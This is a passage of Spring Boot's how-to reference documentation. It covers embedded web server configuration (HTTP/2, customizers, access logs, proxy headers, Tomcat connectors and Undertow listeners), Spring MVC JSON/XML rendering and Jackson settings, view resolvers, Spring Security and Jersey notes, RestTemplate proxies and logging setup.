performance, this server also supports\nHTTP\/2 with native libraries. To enable that, your application needs to have an\nadditional dependency.\n\nSpring Boot manages the version for the\n`io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for\nall platforms. 
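\n\nWith Maven, for example, a sketch of that additional dependency might look as follows\n(no `<version>` is needed, because Spring Boot manages it):\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>io.netty<\/groupId>\n\t\t<artifactId>netty-tcnative-boringssl-static<\/artifactId>\n\t<\/dependency>\n----\n\n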
Alternatively, developers can choose to import only the required dependency for their\nplatform by using a classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official\ndocumentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\n\nGenerally, you should first consider using one of the many available configuration keys\nand customizing your web server by adding new entries in your `application.properties` (or\n`application.yml`, or environment variables; see\n\"`<<howto-discover-build-in-options-for-external-properties>>`\"). The `server.{asterisk}`\nnamespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,\n`server.jetty.{asterisk}`, and others, for server-specific features.\nSee the list of <<common-application-properties>>.\n\nThe previous sections already covered many common use cases, such as compression, SSL,\nor HTTP\/2. However, if a configuration key doesn't exist for your use case, you should\nthen look at\n{dc-spring-boot}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your\nchoice: you should select the variant for the chosen server (Tomcat, Jetty, Reactor Netty,\nUndertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition, Spring Boot provides the following factories:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to\nconfigure specific parts, like connectors, server resources, or the server itself, all\nusing server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will\noverride the one provided by Spring Boot. In this case, you can't rely on configuration\nproperties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, that is, with the `spring-boot-starter-web`, there are two\nways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners\nsupported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must\nprovide a `@Bean` definition for it. Doing so can be very useful when you want to inject\nconfiguration or dependencies. 
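\n\nAs a minimal sketch (`MyFilter` stands in for a `Filter` implementation of your own; the\nsame name is used in the registration example later in this section):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic MyFilter myFilter() {\n\t\treturn new MyFilter();\n\t}\n----\n\n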
However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. 
In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. 
If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\t\/\/ the same store file is used here for both the keystore and the truststore\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore or truststore\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. 
To switch to the `LegacyCookieProcessor`, use a\n`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown\nin the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and\nadd a listener to the `Builder`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowServletWebServerFactory servletWebServerFactory() {\n\t\tUndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket Endpoints Using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThe bean shown in the preceding example registers any `@ServerEndpoint` annotated beans\nwith the underlying WebSocket container. When deployed to a standalone servlet container,\nthis role is performed by a servlet container initializer, and the\n`ServerEndpointExporter` bean is not required.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\nSpring Boot has a number of starters that include Spring MVC. Note that some starters\ninclude a dependency on Spring MVC rather than including it directly. This section answers\ncommon questions about Spring MVC and Spring Boot.\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST Service\nAny Spring `@RestController` in a Spring Boot application should render JSON responses by\ndefault as long as Jackson2 is on the classpath, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy\nobject), `http:\/\/localhost:8080\/thing` serves a JSON representation of it by\ndefault. Note that, in a browser, you might sometimes see XML responses, because browsers\ntend to send accept headers that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST Service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, you\ncan use it to render XML responses. The previous example that we used for JSON would\nwork. 
To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available and JAXB is available, XML can be rendered\nwith the additional requirement of having `MyThing` annotated as `@XmlRootElement`, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nJAXB is only available out of the box with Java 8. If you are using a newer Java\nversion, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.glassfish.jaxb<\/groupId>\n\t\t<artifactId>jaxb-runtime<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: To get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for the Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. 
These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. 
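\n\nAs a sketch, an additional converter can be contributed by declaring a bean (the\n`AdditionalHttpMessageConverter` type here is hypothetical):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic HttpMessageConverter<?> additionalConverter() {\n\t\treturn new AdditionalHttpMessageConverter();\n\t}\n----\n\n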
A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (for example, if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets, you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each one, and Spring Boot registers them transparently with the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual, but if you really need to do it,\nyou must also provide a `@Bean` of type `DispatcherServletPath` to supply the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch Off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. 
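\n\nA minimal sketch might look as follows (the class name is illustrative; implementing\n`WebMvcConfigurer` is one common way to supply your own configuration):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableWebMvc\n\tpublic class MyMvcConfiguration implements WebMvcConfigurer {\n\n\t\t\/\/ override WebMvcConfigurer methods here, such as configureMessageConverters\n\n\t}\n----\n\n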
Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order in which the resolvers are tried and\nwhere your own resolver is added.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it by\nproviding a bean of the same type.\n* A `BeanNameViewResolver` named '`beanNameViewResolver`'. This is a useful member of the\nview resolver chain and picks up any beans with the same name as the `View` being\nresolved. It should not be necessary to override or replace it.\n* A `ContentNegotiatingViewResolver` named '`viewResolver`' is added only if there *are*\nactually beans of type `View` present. This is a '`master`' resolver, delegating to all\nthe others and attempting to find a match to the '`Accept`' HTTP header sent by the\nclient. There is a useful\nhttps:\/\/spring.io\/blog\/2013\/06\/03\/content-negotiation-using-views[blog about\n`ContentNegotiatingViewResolver`] that you might like to study to learn more, and you\nmight also look at the source code for detail. You can switch off the auto-configured\n`ContentNegotiatingViewResolver` by defining a bean named '`viewResolver`'.\n* If you use Thymeleaf, you also have a `ThymeleafViewResolver` named\n'`thymeleafViewResolver`'. It looks for resources by surrounding the view name with a\nprefix and suffix. The prefix is `spring.thymeleaf.prefix`, and the suffix is\n`spring.thymeleaf.suffix`. The values of the prefix and suffix default to\n'`classpath:\/templates\/`' and '`.html`', respectively. You can override\n`ThymeleafViewResolver` by providing a bean of the same name.\n* If you use FreeMarker, you also have a `FreeMarkerViewResolver` named\n'`freeMarkerViewResolver`'. It looks for resources in a loader path (which is\nexternalized to `spring.freemarker.templateLoaderPath` and has a default value of\n'`classpath:\/templates\/`') by surrounding the view name with a prefix and a suffix. The\nprefix is externalized to `spring.freemarker.prefix`, and the suffix is externalized to\n`spring.freemarker.suffix`. The default values of the prefix and suffix are empty and\n'`.ftl`', respectively. 
You can override `FreeMarkerViewResolver` by providing a bean\nof the same name.\n* If you use Groovy templates (actually, if `groovy-templates` is on your classpath), you\nalso have a `GroovyMarkupViewResolver` named '`groovyMarkupViewResolver`'. It looks for\nresources in a loader path by surrounding the view name with a prefix and suffix\n(externalized to `spring.groovy.template.prefix` and `spring.groovy.template.suffix`).\nThe prefix and suffix have default values of '`classpath:\/templates\/`' and '`.tpl`',\nrespectively. You can override `GroovyMarkupViewResolver` by providing a bean of the\nsame name.\n\nFor more detail, see the following sections:\n\n* {sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\n* {sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\n\n\n\n[[howto-use-test-with-spring-security]]\n== Testing With Spring Security\nSpring Security provides support for running tests as a specific user.\nFor example, the test in the snippet below will run with an authenticated user\nthat has the `ADMIN` role.\n\n[source,java,indent=0]\n----\n\t@Test\n\t@WithMockUser(roles=\"ADMIN\")\n\tpublic void requestProtectedUrlWithUser() throws Exception {\n\t\tmvc\n\t\t\t.perform(get(\"\/\"))\n\t\t\t...\n\t}\n----\n\nSpring Security provides comprehensive integration with Spring MVC Test, and\nthis support can also be used when testing controllers using the `@WebMvcTest` slice and `MockMvc`.\n\nFor additional details on Spring Security's testing support, refer to Spring Security's\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#test[reference documentation].\n\n\n\n[[howto-jersey]]\n== Jersey\n\n\n\n[[howto-jersey-spring-security]]\n=== Secure Jersey Endpoints with Spring Security\nSpring Security can be used to secure a Jersey-based web application in much the same\nway as it can be used to secure a Spring MVC-based web application. However, if you want\nto use Spring Security's method-level security with Jersey, you must configure Jersey to\nuse `setStatus(int)` rather than `sendError(int)`. This prevents Jersey from committing the\nresponse before Spring Security has had an opportunity to report an authentication or\nauthorization failure to the client.\n\nThe `jersey.config.server.response.setStatusOverSendError` property must be set to `true`\non the application's `ResourceConfig` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jersey\/JerseySetStatusOverSendErrorExample.java[tag=resource-config]\n----\n\n\n\n[[howto-http-clients]]\n== HTTP Clients\n\nSpring Boot offers a number of starters that work with HTTP clients. This section answers\nquestions related to using them.\n\n[[howto-http-clients-proxy-configuration]]\n=== Configure RestTemplate to Use a Proxy\nAs described in <<spring-boot-features.adoc#boot-features-resttemplate-customization>>,\nyou can use a `RestTemplateCustomizer` with `RestTemplateBuilder` to build a customized\n`RestTemplate`. This is the recommended approach for creating a `RestTemplate` configured\nto use a proxy.\n\nThe exact details of the proxy configuration depend on the underlying client request\nfactory that is being used. 
The following example configures\n`HttpComponentsClientRequestFactory` with an `HttpClient` that uses a proxy for all hosts\nexcept `192.168.0.5`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/web\/client\/RestTemplateProxyCustomizationExample.java[tag=customizer]\n----\n\n\n\n[[howto-logging]]\n== Logging\n\nSpring Boot has no mandatory logging dependency, except for the Commons Logging API, which\nis typically provided by Spring Framework's `spring-jcl` module. To use\nhttps:\/\/logback.qos.ch[Logback], you need to include it and `spring-jcl` on the classpath.\nThe simplest way to do that is through the starters, which all depend on\n`spring-boot-starter-logging`. For a web application, you need only\n`spring-boot-starter-web`, since it depends transitively on the logging starter. If you\nuse Maven, the following dependency adds logging for you:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n----\n\nSpring Boot has a `LoggingSystem` abstraction that attempts to configure logging based on\nthe content of the classpath. If Logback is available, it is the first choice.\n\nIf the only change you need to make to logging is to set the levels of various loggers,\nyou can do so in `application.properties` by using the \"logging.level\" prefix, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nYou can also set the location of a file to which to write the log (in addition to the\nconsole) by using \"logging.file\".\n\nTo configure the more fine-grained settings of a logging system, you need to use the native\nconfiguration format supported by the `LoggingSystem` in question. By default, Spring Boot\npicks up the native configuration from its default location for the system (such as\n`classpath:logback.xml` for Logback), but you can set the location of the config file by\nusing the \"logging.config\" property.\n\n\n\n[[howto-configure-logback-for-logging]]\n=== Configure Logback for Logging\nIf you put a `logback.xml` in the root of your classpath, it is picked up from there (or\nfrom `logback-spring.xml`, to take advantage of the templating features provided by\nBoot). 
